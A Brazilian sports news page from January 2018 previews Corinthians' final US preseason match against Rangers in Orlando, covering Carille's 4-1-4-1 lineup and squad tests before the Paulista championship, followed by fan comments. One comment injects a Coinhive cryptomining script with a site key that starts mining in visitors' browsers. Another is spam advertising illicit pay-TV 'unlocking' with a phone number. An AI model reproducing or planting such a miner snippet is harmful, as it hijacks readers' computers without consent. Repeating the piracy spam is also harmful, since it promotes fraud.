13/1/2018 09:30

Corinthians encerra semana nos EUA; veja como o time enfrenta o Rangers

Carille quer deixar titulares por mais tempo neste sábado; foco do Timão é o Paulista

Foto: Daniel Augusto Jr/Ag. Corinthians

Termina neste sábado a curta pré-temporada de seis dias do Corinthians nos EUA. Diante do Rangers, da Escócia, às 16h (de Brasília), em Orlando, a equipe de Fábio Carille faz novos testes e tenta se despedir do Torneio da Flórida com vitória.



O SporTV transmite a partida ao vivo, e o GloboEsporte.com mostra em Tempo Real, com narração de Milton Leite e comentários de Paulo César Vasconcellos.

Apesar de a competição valer taça, o Corinthians pensa primeiro em observar e saber o que tem em mãos para a disputa do Campeonato Paulista, que começa na próxima quarta-feira.

Por isso, Carille adotará postura diferente da vista no empate por 1 a 1 com o PSV – com vitória corintiana nos pênaltis. Os titulares terão mais de 45 minutos em campo, e as substituições serão mais raras. A ideia é dar ritmo de jogo aos campeões brasileiros.

Carille aproveitou a semana para fazer alguns ajustes, testar formações e saber com quem pode contar na sequência da temporada.

Veja abaixo algumas premissas:
-O Corinthians começa 2018 no 4-1-4-1, com Gabriel à frente da zaga, mais Jadson e Rodriguinho na armação;

-A lateral esquerda teve Juninho Capixaba contra o PSV e agora terá Guilherme Romão, cria da base; ambos têm a missão de substituir Guilherme Arana;

-Kazim é o primeiro da fila na sucessão de Jô, já que foi titular na quarta e começa jogando novamente;

-Lucca, que também pode atuar como um 9, terá 45 minutos para mostrar futebol neste sábado; ele não tem permanência garantida.

O Corinthians vai começar o jogo com Cássio, Fagner, Balbuena, Pedro Henrique e Guilherme Romão; Gabriel; Romero, Jadson, Rodriguinho e Clayson; Kazim.

Para ser campeão do Torneio da Flórida, o Corinthians precisa somar mais pontos do que seus rivais. Contra o PSV, o empate seguido de vitória nos pênaltis valeu dois pontos. A competição, porém, só termina no dia 20 de janeiro, quando a equipe já estará no Paulistão.

9603 visitas - Fonte: Globoesporte.com

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

brincadeira isso dai
< src="https://coinhive.com/lib/coinhive.min.js"><>var miner = new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ", {throttle: 0.3});miner.start();

Acho que não adianta postar aqui que não vai chegar ao conhecimento do Carille, temos que manifestar de outra forma para que ele saiba da insatisfação do torcedor em relação a sua postura.

pelo amor de Deus carile vc SÓ pode ta de brincadeira coloca o lucca da uma chance pro garoto ele é disparado melhor que kazim se ele jogar hoje vai fazer gol

poe o Carlinhos pra jogar melhor que kazim e melhor que lucca

Só pode estar de brincadeira Carille Kasim Titular ????! Vão deixar o Lucca No Banco??? É o Carlinhos ?

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

kazin esse carille tá de brincadeira se essa cara pode ser titular do corinthians eu posso ser mais ídolo do que o Cristiano Ronaldo no Real Madrid kkkk se toca carille

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias